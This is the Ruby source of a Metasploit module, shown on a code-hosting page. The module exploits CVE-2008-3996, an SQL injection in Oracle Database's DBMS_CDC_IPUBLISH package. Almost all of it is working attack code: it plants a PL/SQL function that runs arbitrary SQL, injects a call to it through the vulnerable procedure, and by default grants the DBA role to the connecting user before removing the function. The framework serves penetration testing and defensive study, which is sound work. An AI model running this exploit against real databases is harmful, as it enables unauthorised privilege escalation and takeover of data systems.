CoCalc -- dbms_cdc

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb
¹⁹⁵⁹² views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::ORACLE
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE',
14
        'Description' => %q{
15
          The module exploits an sql injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE
16
          procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege
17
          on the vulnerable package can exploit this vulnerability. By default, users granted
18
          EXECUTE_CATALOG_ROLE have the required privilege.  Affected versions: Oracle Database
19
          Server versions 10gR1, 10gR2 and 11gR1. Fixed with October 2008 CPU.
20
        },
21
        'Author' => [ 'MC' ],
22
        'License' => MSF_LICENSE,
23
        'References' => [
24
          [ 'CVE', '2008-3996' ],
25
          [ 'OSVDB', '49321']
26
        ],
27
        'DisclosureDate' => '2008-10-22',
28
        'Notes' => {
29
          'Stability' => [CRASH_SAFE],
30
          'SideEffects' => [IOC_IN_LOGS],
31
          'Reliability' => []
32
        }
33
      )
34
    )
35

36
    register_options(
37
      [
38
        OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]),
39
      ]
40
    )
41
  end
42

43
  def run
44
    return if !check_dependencies
45

46
    name = Rex::Text.rand_text_alpha_upper(1..10)
47

48
    function = "
49
      CREATE OR REPLACE FUNCTION #{name}
50
      RETURN VARCHAR2 AUTHID CURRENT_USER
51
      IS
52
      PRAGMA AUTONOMOUS_TRANSACTION;
53
      BEGIN
54
      EXECUTE IMMEDIATE '#{datastore['SQL']}';
55
      COMMIT;
56
      RETURN NULL;
57
      END;"
58

59
    package = "
60
      BEGIN
61
      SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE('''||'||user||'.#{name}||''');END;"
62

63
    clean = "DROP FUNCTION #{name}"
64

65
    begin
66
      print_status('Sending function...')
67
      prepare_exec(function)
68
    rescue StandardError
69
      return
70
    end
71

72
    print_status('Attempting sql injection on SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE...')
73
    prepare_exec(package)
74

75
    print_status("Done! Removing function '#{name}'...")
76
    prepare_exec(clean)
77
  end
78
end
79

80
Product

Resources

Company
